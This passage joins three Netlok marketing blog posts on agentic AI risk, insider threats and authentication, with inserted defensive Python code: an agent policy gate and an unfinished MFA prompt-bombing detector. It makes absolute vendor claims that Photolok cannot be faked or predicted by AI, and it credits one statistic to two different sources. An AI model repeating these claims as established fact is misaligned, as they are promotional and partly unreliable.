Here’s what security leaders need to know: 

1) OWASP released its first Top 10 for Agentic Applications in December 2025, identifying critical risks from goal hijacking to rogue agents that security teams must address immediately. 

2) Forrester predicts that agentic AI will cause a major public breach in 2026, with consequences severe enough to result in employee dismissals. 

3) The identity layer is the critical control point, and Photolok’s patented photo-based authentication addresses this gap directly, replacing vulnerable credentials with dynamic, steganography-powered verification that AI cannot predict, harvest, or replay. 

The Numbers That Define 2026 

Metric | Finding | Source
Companies with AI agents in production | 57% of enterprises surveyed | G2 August 2025
Practitioners citing security as top AI agent challenge | 62% of AI practitioners surveyed | Warmly Research 2025
Vulnerable agent framework components identified | 43 distinct components compromised via supply chain | Stellar Cyber 2025

What Makes Agentic AI Different (and Dangerous) 

If you’ve been following AI developments, you might think this is just another incremental step. It’s not. The shift from generative AI to agentic AI represents a categorical change in risk. 

Here’s the difference: A standard large language model generates content like text or code. An agentic AI takes that several steps further. It uses tools, makes decisions, and performs multi-step tasks autonomously in digital or physical environments. It doesn’t just talk; it does. 

Think about what that means in practice. As an example, an AI agent handling procurement can autonomously negotiate with suppliers, issue purchase orders, and authorize payments. A customer service agent can access customer records, modify accounts, and execute transactions. A security operations agent can respond to alerts, quarantine systems, and modify access controls. 

When software can make decisions and act on its own, security strategies must shift from static policy enforcement to real-time behavioral governance. The OWASP GenAI Security Project put it directly: “Once AI began taking actions, the nature of security changed forever.” 

The OWASP Top 10 for Agentic Applications: Your New Security Framework 

In December 2025, OWASP released the first comprehensive security framework specifically designed for autonomous AI systems. This framework names the ten most critical security risks for autonomous/agentic AI systems and gives high-level guidance to mitigate them. It is meant as the “field manual” for securing AI agents that can plan, act, use tools, and make decisions across workflows, similar in spirit to the classic OWASP Top 10 for web apps but focused on agentic AI. Developed with input from over 100 security researchers and providers including AWS and Microsoft, the Top 10 for Agentic Applications was built from real incidents – confirmed cases of data exfiltration, remote code execution, memory poisoning, and supply chain compromise.
 
The 10 risks (at a glance) 

  1. Agent Goal Hijack – Attackers steer the agent’s objectives or plans (for example via prompt injection, poisoned documents, or manipulated tools) so that it optimizes for the wrong goal. [Astrix]
  2. Tool Misuse & Exploitation – The agent is tricked or misconfigured into abusing powerful tools (file systems, email, DevOps, finance APIs, etc.) in ways the attacker chooses. [Giskard]
  3. Identity & Privilege Abuse – Over-privileged or poorly isolated agent identities, leaked credentials, or confused delegation allow attackers to escalate what the agent can do. [Astrix]
  4. Agentic Supply Chain Vulnerabilities – Compromise or tampering in models, plugins, tools, RAG datasets, orchestration scripts, or external components that agents depend on. [Palo Alto Networks]
  5. Unexpected Code Execution (RCE) – Agents generating or executing attacker-controlled code, commands, or workflows (e.g., “just run this script” style attacks). [Giskard]
  6. Memory & Context Poisoning – Long-term memory, RAG indices, or contextual knowledge stores are corrupted so that future decisions and actions become unsafe. [ActiveFence]
  7. Insecure Inter-Agent Communication – Spoofed, tampered, or eavesdropped messages between agents and tools, leading to mis-coordination and compromise. [Astrix]
  8. Cascading Failures – Errors or compromises in one agent, tool, or step propagate across multi-agent workflows, amplifying impact at scale. [Palo Alto Networks]
  9. Human-Agent Trust Exploitation – Over-trust in confident agents causes humans to approve harmful actions or disclose sensitive data. [ActiveFence]
  10. Rogue Agents – Misaligned, compromised, or self-propagating agents that operate outside intended boundaries or conceal their behavior. [Giskard]

The Shadow Agent Problem Nobody Wants to Talk About 

Remember shadow IT? We’re seeing the exact same pattern with AI agents now, except the stakes are exponentially higher. 

According to Omdia research, while many enterprises deploy AI agents within controlled environments like Salesforce Agentforce, the real value comes from touching core applications and processes. That’s also where significant cyber risk lives. Employees are connecting AI tools to company systems without IT oversight, development teams use AI coding assistants with broad repository access, and business units deploy automation agents with excessive privileges. Each of these creates unvetted identity providers and data paths that exist entirely outside normal IAM controls. 

The Barracuda Security report from November 2025 identified 43 agent framework components with embedded vulnerabilities via supply chain compromise. Researchers have already discovered malicious MCP (Model Context Protocol) servers in the wild. MCP servers are essentially plug-in tools that extend what agents can do, and a compromised one gives attackers direct access to agent capabilities. One malicious package impersonated a legitimate email service but secretly forwarded every message to an attacker. Another contained dual reverse shells. Any AI agent using these tools was unknowingly exfiltrating data or providing remote access. 

Why Traditional Authentication Fails the Agentic AI Challenge 

Every security incident I’ve described, whether it’s goal hijacking, privilege escalation, or rogue agents, eventually comes down to identity and access. Traditional authentication wasn’t designed for a world where autonomous systems need verified identities, where the line between human and machine actors blurs, and where attackers use AI to generate convincing impersonations at machine speed.

For internal use (protecting team members): How do you ensure the person authorizing an agent’s action is actually who they claim to be? How do you detect coercion? For example, traditional passwords are vulnerable to phishing, and AI now generates sophisticated social engineering attacks. 

For customer-facing applications: When AI agents handle customer interactions, how do you verify identity without friction? Biometrics face growing threats from deepfakes that convincingly impersonate real people. 

For agent-to-system authentication: As Salesforce’s Model Containment Policy emphasizes, AI models must be granted only the minimum necessary capabilities. Enforcing this requires robust authentication at every access point, something static credentials cannot provide. 
 
What is the solution? 

This is why we built Photolok at Netlok. Passwords and static one-time codes were designed for human logins in a pre-cloud, pre-agentic AI world, not for autonomous systems making thousands of decisions at machine speed. Photolok’s patented photo-based authentication uses steganography-coded images that randomize every session, creating a verification method designed for a world where attackers use AI to harvest, guess, and replay credentials at machine speed. 

For internal teams: Photolok’s intuitive selection process, where users recognize and select their login photos, cannot be replicated by AI or automated systems. When an employee authorizes a sensitive agent action, you have high confidence it’s actually them. 

The Duress Photo feature addresses scenarios that most security tools ignore. If someone is being coerced into approving an agent’s action, whether through social engineering, physical threat, or insider pressure, they can select a designated photo that grants access but silently alerts security. This applies not just to physical coercion but also to high-stakes financial approvals, privileged access changes, and any agent-executed transaction where verification matters. In an era where AI agents execute transactions in milliseconds, this silent alarm could prevent catastrophic damage.

Against AI-powered attacks: Because Photolok’s login process uses dynamic photo randomization and embedded steganographic codes, AI/ML tools have minimal attack surface to work with.

Learning from Enterprise AI Governance: The Salesforce Model 

Salesforce’s approach to agentic AI security, documented in their Model Containment Policy and AI Acceptable Use Policy, provides a blueprint every organization should study. Their core principle: “The model reasons; the platform decides.” LLMs provide language intelligence, but configuration provides authority, safety, and accountability. 

Key governance requirements: 

No Autonomous Authority: AI models may recommend, summarize, classify, or assist, but must not make final decisions with legal, financial, safety, or rights-impacting consequences. Final authority must reside with a human or deterministic system. 

Deterministic Control Over Probabilistic Behavior: Critical behaviors must be enforced outside the model. Routing, permissions, approvals, and enforcement must not rely on model judgment. Prompts may guide behavior but must never be the sole enforcement mechanism. 

Human-in-the-Loop Requirements: Human review is mandatory when AI output affects individuals’ rights, is used in regulated domains, is externally published, or supports high-risk decisions. 

No Self-Expansion: AI models must not modify their own instructions, permissions, or scope; generate or deploy new tools; escalate privileges; or chain actions indefinitely without external limits. 

These aren’t optional guidelines. They’re foundational requirements for safe AI agent deployment. 

The Real Cost of Waiting 

The organizations deploying AI agents today face a choice: implement proper governance now, or scramble to explain failures later. 

Omdia analyst Todd Thiemann’s prediction for 2026 is blunt: “Some early AI agent deployments will get pushed into production with inadequate QA testing, insufficient security guardrails, or an over-permissioned agent, and we will start to see mischief involving AI agents. I expect 2026 will see AI agents touching core business processes, and some high-profile data breaches and fraud originating from those AI agents.” 

Forrester’s prediction is even more direct: Agentic AI will cause a major public breach in 2026 that will lead to employee dismissals. When that breach happens, expect board investigations, regulatory scrutiny over data protection and financial controls, and serious questions about executive accountability. The fallout won’t be limited to IT departments. 

The question isn’t whether your organization will face these risks. It’s whether you’ll be ready when they arrive. 

What Security Leaders Should Do Now 

1. Audit your AI agent exposure. Find out what agents your organization is actually using, what systems they can access, and what actions they can take. You can’t secure what you don’t know about. 

2. Implement the principle of least agency. Every AI agent should have only the minimum autonomy required. Review and restrict agent permissions aggressively. Require human approval before agents can execute financial transactions, modify access controls, delete data, or take any action that cannot be easily reversed.

3. Establish deterministic controls for critical decisions. Don’t rely on prompts (the natural language instructions that tell AI agents what to do and how to behave) for security enforcement. Build guardrails into your architecture that cannot be bypassed through prompt manipulation. 

4. Rethink authentication for the agentic era. Evaluate modern alternatives like Photolok that resist AI-powered attacks and provide verification that autonomous systems cannot fake. 

5. Build strong observability. Implement comprehensive logging of agent actions. Monitor for behavioral anomalies. Create kill switches for rapid disabling. 

6. Brief your leadership. AI agent security is a governance issue. Ensure your board of directors understands the stakes before an incident forces that conversation. 
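As an added illustration (not code from Netlok, Salesforce, or OWASP), the sketch below shows how steps 2, 3, and 5 and the governance requirements above can be enforced outside the model: a default-deny gate between an agent and its tools, with single-use human approvals, a per-task action budget, an audit log, and a kill switch. The agent name, tool names, limits, and approver address are hypothetical, constructed values.

```python
import json
import time

# Constructed policy for illustration; agent and tool names are hypothetical.
POLICY = {
    "procurement-agent": {
        "allowed_tools": {"search_suppliers", "draft_purchase_order",
                          "authorize_payment"},
        "max_actions_per_task": 3,
    },
}

# Actions that cannot be easily reversed always need a human approval recorded
# by the platform, whatever the agent's prompt or output says.
HUMAN_APPROVAL_REQUIRED = {"authorize_payment", "modify_access_control",
                           "delete_data"}


class PolicyGate:
    """Sits between the agent and its tools; the model cannot read or edit it."""

    def __init__(self, policy, clock=time.time):
        self._policy = policy
        self._clock = clock
        self._disabled = set()       # kill switch state
        self._approvals = {}         # (task_id, tool) -> approver
        self._action_counts = {}     # (agent_id, task_id) -> allowed actions
        self.audit_log = []          # one JSON line per decision

    def disable_agent(self, agent_id):
        """Kill switch: every later call from this agent is denied."""
        self._disabled.add(agent_id)

    def record_human_approval(self, task_id, tool, approver):
        """Called by the approval workflow after the human has authenticated,
        never by the agent itself."""
        self._approvals[(task_id, tool)] = approver

    def authorize(self, agent_id, task_id, tool, args):
        """Decide on one tool call and log the decision, allowed or not."""
        allowed, reason = self._decide(agent_id, task_id, tool)
        self.audit_log.append(json.dumps({
            "ts": self._clock(), "agent": agent_id, "task": task_id,
            "tool": tool, "args": args, "allowed": allowed, "reason": reason,
        }, sort_keys=True, default=str))
        return allowed, reason

    def _decide(self, agent_id, task_id, tool):
        if agent_id in self._disabled:
            return False, "agent disabled by kill switch"
        rules = self._policy.get(agent_id)
        if rules is None:
            return False, "unknown agent"            # unregistered agents get nothing
        if tool not in rules["allowed_tools"]:
            return False, "tool not in allow-list"   # default deny
        key = (agent_id, task_id)
        used = self._action_counts.get(key, 0)
        if used >= rules["max_actions_per_task"]:
            return False, "action budget exhausted"  # no indefinite chaining
        if tool in HUMAN_APPROVAL_REQUIRED:
            # Approvals are single use: pop() consumes the record.
            approver = self._approvals.pop((task_id, tool), None)
            if approver is None:
                return False, "human approval required"
            reason = f"approved by {approver}"
        else:
            reason = "within policy"
        self._action_counts[key] = used + 1
        return True, reason


def demo():
    """Run a constructed sequence of tool calls through the gate."""
    gate = PolicyGate(POLICY, clock=lambda: 0)
    agent, task = "procurement-agent", "t1"
    payment = {"amount": 9000, "approved": True}  # "approved" is model output
    results = [
        # Routine, reversible action: allowed.
        gate.authorize(agent, task, "search_suppliers", {"q": "steel"}),
        # The agent's own claim of approval inside its arguments is ignored.
        gate.authorize(agent, task, "authorize_payment", payment),
        # Self-expansion attempt: the tool is not in the allow-list.
        gate.authorize(agent, task, "register_tool", {"name": "wire_transfer"}),
    ]
    # A human approves out of band; the payment is then allowed exactly once.
    gate.record_human_approval(task, "authorize_payment", "cfo@example.com")
    results.append(gate.authorize(agent, task, "authorize_payment", payment))
    results.append(gate.authorize(agent, task, "authorize_payment", payment))
    # Kill switch: even routine actions are denied afterwards.
    gate.disable_agent(agent)
    results.append(gate.authorize(agent, task, "search_suppliers", {"q": "steel"}))
    return gate, results


if __name__ == "__main__":
    for allowed, reason in demo()[1]:
        print("ALLOW" if allowed else "DENY ", reason)
```

The gate never inspects the prompt or the model's reasoning; it decides only on the agent identity, the tool name, and state the platform itself recorded, so prompt manipulation cannot change the outcome.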

The Bottom Line 

The enterprise AI landscape in 2026 is moving faster than most security frameworks can adapt. AI agents are no longer experiments. They’re production systems with real permissions and real consequences. The organizations that act now to implement proper governance, authentication, and observability will be the ones that capture the value of agentic AI without becoming the next cautionary tale. Acting now also protects financial results and preserves ROI.

The OWASP Agentic Top 10 gives us a framework. Enterprise policies like Salesforce’s provide governance blueprints. Modern authentication like Photolok addresses the identity challenges that traditional methods cannot solve. 

The tools exist. The question is whether your organization will use them before or after the breach. 

Photolok Offer 

Want to see how Photolok can help secure your organization’s AI-powered future? Request Your Personalized Demo Today. 

About the Author 

Kasey Cromer is Director of Customer Experience at Netlok. 

Sources 

[1] PwC. “AI Agent Survey.” May 2025. https://www.pwc.com/us/en/tech-effect/ai-analytics/ai-agent-survey.html 

[2] Gartner. “Gartner Predicts 40% of Enterprise Apps Will Feature Task-Specific AI Agents by 2026.” August 2025. https://www.gartner.com/en/newsroom/press-releases/2025-08-26 

[3] OWASP GenAI Security Project. “OWASP Top 10 for Agentic Applications for 2026.” December 2025. https://genai.owasp.org/resource/owasp-top-10-for-agentic-applications-for-2026/ 

[4] Forrester. “Predictions 2026: Cybersecurity and Risk.” October 2025. https://www.forrester.com/blogs/predictions-2026-cybersecurity-and-risk/ 

[5] Stellar Cyber. “Top Agentic AI Security Threats in 2026.” December 2025. https://stellarcyber.ai/learn/agentic-ai-securiry-threats/ 

[6] G2. “Enterprise AI Agents Report: Industry Outlook for 2026.” December 2025. https://learn.g2.com/enterprise-ai-agents-report 

[7] CyberArk. “AI Agents and Identity Risks: How Security Will Shift in 2026.” December 2025. https://www.cyberark.com/resources/blog/ai-agents-and-identity-risks-how-security-will-shift-in-2026 

[8] BleepingComputer. “The Real-World Attacks Behind OWASP Agentic AI Top 10.” January 2026. https://www.bleepingcomputer.com/news/security/the-real-world-attacks-behind-owasp-agentic-ai-top-10/ 

[9] Omdia/Dark Reading. “Identity Security 2026: Predictions and Recommendations.” January 2026. https://www.darkreading.com/identity-access-management-security/identity-security-2026-predictions-and-recommendations 

[10] SecurityWeek. “Rethinking Security for Agentic AI.” January 2026. https://www.securityweek.com/rethinking-security-for-agentic-ai/ 

[11] Cloud Security Alliance. “Top 10 Predictions for Agentic AI in 2026.” January 2026. https://cloudsecurityalliance.org/blog/2026/01/16/my-top-10-predictions-for-agentic-ai-in-2026 

[12] McKinsey. “The State of AI in 2025: Agents, Innovation, and Transformation.” November 2025. https://www.mckinsey.com/capabilities/quantumblack/our-insights/the-state-of-ai 

[13] Salesforce. “Artificial Intelligence Acceptable Use Policy.” December 2025. https://www.salesforce.com/company/legal/agreements/ 

[14] Salesforce. “Model Containment Policy.” January 2026. 

[15] Netlok. “How Photolok Works.” 2025. https://netlok.com/how-it-works/ 

[16] MIT/CIO. “2026: The Year AI ROI Gets Real.” January 2026. https://www.cio.com/article/4114010/2026-the-year-ai-roi-gets-real.html 

[17] Astrix Security. “The OWASP Agentic Top 10 Just Dropped: Here’s What You Need to Know.” December 2025. https://astrix.security/learn/blog/the-owasp-agentic-top-10-just-dropped-heres-what-you-need-to-know/ 

[18] Giskard. “OWASP Top 10 for Agentic Applications 2026: Security Guide.” December 2025. https://www.giskard.ai/knowledge/owasp-top-10-for-agentic-application-2026 

[19] Palo Alto Networks. “OWASP Top 10 for Agentic Applications 2026 Is Here.” December 2025. https://www.paloaltonetworks.com/blog/cloud-security/owasp-agentic-ai-security/ 

[20] ActiveFence. “OWASP Top 10 for Agentic AI.” December 2025. https://www.activefence.com/blog/owasp-top-10-agentic-ai/ 

Kasey Cromer, Netlok | January 15, 2026

Executive Summary

The uncomfortable truth about workplace security in 2026 is that the biggest threat probably isn’t some hacker halfway around the world. It’s the 1) employee who already has access to your systems, 2) AI tool someone downloaded without telling IT, or 3) remote worker logging in from a coffee shop with sketchy Wi-Fi. This blog explores these converging threats facing organizations in 2026 and why traditional defenses are failing. The facts are:

The Numbers That Should Keep You Up at Night

Metric | Finding | Source
Security leaders saying risk has never been higher | 72% | Vanta 2025
Average annual cost of insider incidents | $17.4 million | Ponemon 2025
Days to detect and contain insider incident | 81 days | Ponemon 2025
Companies reporting AI-powered attacks increased | 50% | Vanta 2025
Organizations with formal AI security policies | Only 44% | Vanta 2025
Organizations reporting physical security breaches | Over 60% | Zona Facta 2025

What’s Actually Changed This Year?

Security folks have been warning about “evolving threats” for years. But 2026 really is different. The reason? AI stopped being experimental. Google Cloud’s Cybersecurity Forecast 2026 puts it bluntly: attackers have “fully embraced AI.” They’re not dabbling anymore. They’re using it to craft perfect phishing emails, generating deepfake videos of executives, and cracking passwords faster than we ever thought possible.

According to Vanta’s State of Trust Report, 72% of security leaders now say risk has never been higher. That’s up from 55% just a year ago. These aren’t people prone to panic. They’re professionals watching the threat landscape shift beneath their feet in real time.

What concerns me most? SecurityWeek predicts that deepfakes have gotten “good enough and cheap enough to convincingly impersonate executives.” Think about what that means. When your CFO gets a video call from the CEO asking for an urgent wire transfer, how do they actually know it’s the real CEO on the other end? The visual and audio cues we’ve relied on for decades to verify identity are becoming meaningless.

The Shadow AI Problem Nobody Wants to Talk About

Remember shadow IT? Back when employees started using Dropbox and Google Docs without permission because the company tools were too clunky? We’re seeing the exact same pattern with AI now, except the stakes are dramatically higher.

IBM is predicting that there will be “major security incidents where sensitive IP is compromised through shadow AI systems” this year. Here’s what’s happening in practice: employees are feeding proprietary data into ChatGPT and other tools without thinking twice. Marketing is using AI to draft customer communications. Engineering is debugging code with AI assistants. Legal is summarizing contracts. And IT often has absolutely no idea any of it is happening. Each of these interactions potentially exposes company secrets, data, and other system and company information to systems the company doesn’t control.

But it gets even stranger. Palo Alto Networks warns that AI agents themselves are becoming insider threats. These autonomous systems can access privileged data, operate around the clock, and if misconfigured, cause damage at machine speed. We’re not just worried about rogue employees anymore. We’re worried about rogue algorithms that never sleep and can process thousands of transactions before anyone notices something is wrong.

Insiders: Still Your Biggest Headache

The Ponemon Institute’s latest research delivers some brutal numbers: insider-related incidents cost companies an average of $17.4 million per year. It takes an average of 81 days just to detect and contain these threats. That’s nearly three months of damage accumulating before you even realize something is wrong. And the longer it takes, the worse it gets. Incidents that drag past 90 days cost nearly $19 million per company on average.

Here’s a twist that sounds like something from a spy novel: Security Boulevard reports that real human operatives, not bots or AI, are now getting hired as remote employees. They use stolen identities to pass interviews and background checks, then gain completely legitimate access to company systems. North Korean operatives have already pulled this off at multiple Western companies. Your next security breach might come from someone sitting in your own Slack channels, attending your team meetings, and collecting a paycheck while they exfiltrate your data.

DTEX Systems’ 2026 forecast emphasizes something important: insider risk is no longer confined to malicious employees. It now includes unmanaged AI use, machine identities, agentic systems, and coordinated nation state infiltration. The old categories we used to think about insider threats have basically exploded. The boundary between “inside” and “outside” barely means anything when your attack surface includes every AI tool, every remote connection, and every automated system with access to your network.

The Remote Work Reality Check

By now, nearly 70% of the global workforce works remotely at least part of the time. That means your security perimeter now includes every employee’s home network, their local coffee shop, that hotel Wi-Fi they used on vacation while “just checking email real quick,” and every personal device that’s ever connected to company resources.

Vena Solutions found that 42% of organizations got hit by successful phishing attacks where remote workers were targeted in 2025. And here’s the part that should worry every security leader: only 6% of organizations feel confident they’ve actually covered all their security gaps. That’s a whole lot of hope and not much certainty. Most companies are essentially crossing their fingers and hoping their distributed workforce doesn’t accidentally open the door to attackers.

Physical Security Still Matters

With all the focus on cyber threats, it’s easy to forget that physical security is still a massive concern. Medical Economics reports that healthcare workers are getting attacked at alarming rates. A staggering 91% of emergency physicians reported being threatened or assaulted in the past year. California’s new SB 553 law now requires most employers to have written workplace violence prevention plans, and other states are following with similar legislation.

According to Zona Facta’s analysis, over 60% of all organizations experienced a physical security breach last year, costing mid-sized companies around $450,000 per incident. Yet only 20% have an updated, documented security strategy. That disconnect between the reality of the risk and the preparedness to handle it is a serious problem that needs attention.

Why Passwords Just Don’t Cut It Anymore

Every security incident I’ve described, whether it’s a hacker, a rogue employee, a deepfake scam, or a nation state operative, eventually comes down to one thing: authentication. Someone got access they shouldn’t have. And our current methods are failing badly.

Passwords get phished, guessed, or cracked by AI in seconds. SMS-based two-factor authentication is vulnerable to SIM swapping attacks that are easier to pull off than most people realize. Even biometrics have serious problems. You can’t exactly change your fingerprints or retina scan if that data gets compromised. Once it’s stolen, it’s stolen forever.

This is exactly why we built Photolok at Netlok. Instead of passwords or static credentials that can be stolen, Photolok uses photos you select with encrypted codes embedded through steganography. The photos are randomized every session, so there’s no pattern for AI to learn or attackers to exploit. And unlike a password, which requires creating and memorizing something new, or a biometric, where you quickly run out of options, you can swap your Photolok photos in seconds. If you think something might be compromised, just pick new photos and you’re secure again immediately.

We also built in a Duress Photo feature that addresses a scenario most security tools completely ignore. If someone forces you to log in, whether that’s a robbery, coercion, or an emergency situation, you select a designated photo that grants access but silently alerts security and/or IT that something is wrong. The system lets you comply with the threat while simultaneously calling for help. It’s the kind of feature you hope you never need, but you’ll be grateful it exists if you ever do.

In an era where AI, insiders, and remote work all converge on authentication as the weakest link, Photolok gives you a modern control point that attackers can’t easily mimic, phish, or reuse. It’s authentication built for the threats of 2026, not the threats of earlier times.

The Real Cost of Waiting

Here’s what keeps me up at night: the difference in impact between catching an insider threat early and catching it late can be enormous. Ponemon found that incidents resolved within 31 days cost around $10.6 million on average. Let them drag past 90 days and you’re looking at nearly $19 million. That’s not a rounding error. The $10 million loss may well end your career, too.

BlackFog reports that 77% of corporate boards have now discussed the material and financial implications of cybersecurity incidents. That’s up 25 percentage points since 2022. Security failures aren’t just IT problems buried in some technical report anymore. They’re board level governance issues that can tank stock prices and destroy reputations overnight.

Forrester is predicting that 2026 will see agentic AI cause a major public breach. When that happens, and it’s a matter of when not if, every executive is going to be asking their security team whether they are prepared and, if not, why not. The organizations that took action early will have answers. The ones that waited will be scrambling to explain why they ignored all the warning signs.

What Security Leaders Should Do Now

If you’re responsible for security at your organization, here’s where to focus:

The Bottom Line

The workplace security landscape in 2026 is messy, complicated, and honestly frightening. AI is supercharging attacks in ways we’re only beginning to understand. Insiders, both human and algorithmic, pose risks that traditional security tools weren’t designed to handle. And the permanent shift to hybrid work has expanded what you need to protect far beyond any physical office.

But here’s what I keep telling people: the organizations that act now, rather than waiting for a breach to force their hand, will be the ones that come out ahead. The question isn’t whether you’ll face these threats. It’s whether you’ll be ready when they arrive.

Want to see how Photolok can help protect your organization?

Request Your Personalized Demo

About the Author

Kasey Cromer is Director of Customer Experience at Netlok.

Sources

[1] Google Cloud. “Cybersecurity Forecast 2026.” November 2025. https://cloud.google.com/blog/topics/threat-intelligence/cybersecurity-forecast-2026/

[2] Vanta. “Top 6 AI Security Trends for 2026.” December 2025. https://www.vanta.com/resources/top-ai-security-trends-for-2026

[3] SecurityWeek. “Five Cybersecurity Predictions for 2026.” December 2025. https://www.securityweek.com/five-cybersecurity-predictions-for-2026-identity-ai-and-the-collapse-of-perimeter-thinking/

[4] IBM. “Cybersecurity Trends: Predictions for 2026.” December 2025. https://www.ibm.com/think/news/cybersecurity-trends-predictions-2026

[5] Palo Alto Networks / Harvard Business Review. “6 Cybersecurity Predictions for the AI Economy in 2026.” December 2025. https://hbr.org/sponsored/2025/12/6-cybersecurity-predictions-for-the-ai-economy-in-2026

[6] Ponemon Institute. “2025 Cost of Insider Risks Global Report.” 2025. https://ponemon.dtexsystems.com/

[7] Security Boulevard. “Security Predictions 2026: Insider Risk & Trust.” January 2026. https://securityboulevard.com/2026/01/security-predictions-2026-insider-risk-trust/

[8] DTEX Systems. “2026 Cybersecurity Predictions.” December 2025. https://www.dtexsystems.com/blog/2026-cybersecurity-predictions/

[9] Baarez Technology Solutions. “Cybersecurity for Hybrid Workforces.” April 2025. https://baarez.com/cybersecurity-risks-for-hybrid-workforces-in-2025/

[10] Vena Solutions. “Remote Work Statistics and Trends for 2026.” November 2025. https://www.venasolutions.com/blog/remote-work-statistics

[11] Medical Economics. “Workplace Violence Prevention in 2026.” November 2025. https://www.medicaleconomics.com/view/6-tips-for-strengthening-workplace-violence-prevention-in-2026-and-beyond

[12] Zona Facta. “Reassess Your Workplace Security Strategy Before 2026.” November 2025. https://zonafacta.com/how-to-reassess-your-workplace-security-strategy-before-2026/

[13] Netlok. “How Photolok Works.” 2025. https://netlok.com/how-it-works/

[14] BlackFog. “Enterprise Cybersecurity in 2026.” December 2025. https://www.blackfog.com/enterprise-cybersecurity-2026-strategies-trends/

[15] Forrester. “Predictions 2026: Cybersecurity and Risk.” October 2025. https://www.forrester.com/blogs/predictions-2026-cybersecurity-and-risk/

Kasey Cromer, Netlok | January 5, 2026

Executive Summary

Insider threats now cost an average of $17.4 million annually per enterprise, and 93% of security leaders say these attacks are harder to detect than external breaches. The uncomfortable truth: your most significant security vulnerability isn’t a sophisticated hacker probing your perimeter. It’s the trusted employee, contractor, or compromised credential holder who already has the keys to your kingdom. As AI-powered attacks accelerate and traditional authentication methods fail, organizations must fundamentally rethink how they verify identity at the point of access.

Predictions at a Glance

Metric | Finding | Source
Average annual cost of insider incidents per enterprise | $17.4 million | Ponemon Institute 2025 [1]
Organizations experiencing insider incidents in past year | 83% | Cybersecurity Insiders 2024 [2]
Security leaders who find insider threats harder to detect than external attacks | 93% | Cybersecurity Insiders 2025 [3]
Breaches involving stolen credentials | 22% | Verizon DBIR 2025 [4]
Average days to detect and contain an insider incident | 81 days | Ponemon Institute 2025 [1]
Cost of incidents taking 91+ days to contain | $18.7 million | Ponemon Institute 2025 [1]
Organizations confident in preventing insider threats before damage occurs | 23% | Cybersecurity Insiders 2025 [3]

The Insider Threat Problem Is Getting Worse

When CrowdStrike, one of the world’s leading cybersecurity firms, announced in November 2025 that it had terminated an employee for sharing internal screenshots with hackers, it sent shockwaves through the industry [5]. If a company whose entire business model revolves around stopping breaches can be compromised from within, what chance does the average enterprise have?

The incident wasn’t isolated. The threat group known as Scattered Lapsus$ Hunters reportedly paid $25,000 for the insider’s cooperation, seeking authentication cookies and access to internal dashboards [6]. The attackers didn’t need zero-day exploits or sophisticated malware. They needed one person with legitimate access willing to provide critical information and look the other way.

This is the new reality of enterprise security. According to the World Economic Forum’s Global Cybersecurity Outlook 2025, identity theft has climbed to the top of the agenda, emerging as the primary cyber risk concern for both CISOs and CEOs [7]. The report notes that 72% of respondents say cyber risks have risen in the past year, with identity theft and credential compromise driving much of that increase.

Why Traditional Security Can’t Stop Insiders

The fundamental challenge with insider threats is deceptively simple: insiders already have authorized access. They know where sensitive data lives. They understand your security controls and their blind spots. Traditional perimeter defenses are useless against someone who legitimately belongs inside the perimeter.

The Verizon 2025 Data Breach Investigations Report underscores this vulnerability. Stolen credentials were the initial access vector in 22% of all breaches analyzed, and a staggering 88% of basic web application attacks involved the use of stolen credentials [4]. Once an attacker logs in with valid credentials, even robust firewalls and VPNs become irrelevant.

The detection gap is equally troubling. The 2025 Cybersecurity Insiders report found that 93% of organizations say insider threats are as difficult or harder to detect than external cyberattacks [3]. Only 21% extensively integrate behavioral indicators such as HR signals, financial stress, and psychosocial context into their detection programs. The result? Organizations are watching shadows while the real danger moves unchecked.

The Three Types of Insider Threats Bypassing Your Defenses

Understanding how insiders bypass security requires recognizing the three distinct threat profiles that enterprises face:

The Negligent Insider represents the most common category. According to Ponemon Institute research, 55% of insider incidents stem from employee negligence [1]. These aren’t malicious actors; they’re frustrated workers circumventing clunky security controls to meet deadlines, sharing passwords for convenience, or falling victim to sophisticated phishing attacks. The 2025 cost per negligent insider incident reached $8.8 million annually.

The Malicious Insider acts with deliberate intent. The cost per malicious insider incident reached $715,366 in 2025 [8]. These individuals exploit their knowledge of internal systems and security measures to steal data, sabotage operations, or sell access to external threat actors, as the CrowdStrike case demonstrated.

The Compromised Insider blurs the line between internal and external threats. This rapidly growing category occurs when an employee’s credentials are stolen through phishing, infostealers, or social engineering. The attacker then operates under the guise of a legitimate, trusted user. Verizon’s DBIR found that 54% of ransomware victims had their company domains appear in stolen credential databases, and 40% had corporate email addresses exposed in those same breaches [4].

AI Is Accelerating the Threat

The artificial intelligence revolution has fundamentally altered the threat calculus. The World Economic Forum reports that nearly 47% of organizations view adversarial advances powered by generative AI as their primary concern [7]. AI-driven deepfake technology allows criminals to impersonate individuals with deceptive accuracy, potentially bypassing verification systems that rely on static credentials or predictable biometric patterns.

The 2025 Cybersecurity Insiders report highlights growing concern about AI-enabled insider risks [3]: 60% of organizations are highly concerned about employees misusing AI tools, and the leading worries include deepfake phishing and social engineering (69%), automated data exfiltration (61%), and AI-assisted credential abuse (53%).

Traditional passwords offer no defense against these evolving attacks. AI password crackers can now breach most passwords in seconds and complex ones in minutes. When combined with social engineering techniques, AI tools can decipher credentials far more quickly than earlier systems, making password-based authentication effectively obsolete against determined adversaries.

The Authentication Failure Point

Every insider threat incident shares a common vulnerability: the authentication layer. Whether credentials are stolen through infostealers, purchased on the dark web, or simply observed over a shoulder, the point of entry remains the same. Once past the login gate, insiders have freedom to operate.

The problem with conventional authentication methods is their predictability. Passwords can be guessed, phished, or cracked. SMS-based multi-factor authentication is vulnerable to SIM swapping. Even biometrics present challenges; once compromised, they cannot be changed. The Verizon DBIR explicitly recommends against SMS one-time passwords for MFA, noting their vulnerability to bypass techniques [4].

MFA bypass has become a sophisticated attack category. Techniques like prompt bombing (flooding users with authentication requests until they accept), adversary-in-the-middle attacks (intercepting MFA prompts in real-time), and token theft are becoming standard tools for threat actors. The DBIR found that these MFA bypass techniques appeared in a significant percentage of breach incidents.
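Prompt bombing leaves a recognizable trace in MFA push logs: a burst of denied or timed-out prompts for one account, sometimes ending in an approval. The detector below is an added example, not taken from the DBIR or from Netlok; the log format, window and threshold are assumptions, and the sample lines are constructed.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample of MFA push events (not real logs): timestamp, user, result.
SAMPLE_LOG = """\
2025-11-03T09:00:05Z alice approved
2025-11-03T13:40:00Z bob denied
2025-11-03T13:40:20Z bob timeout
2025-11-03T13:40:45Z bob denied
2025-11-03T13:41:10Z bob timeout
2025-11-03T13:41:30Z bob denied
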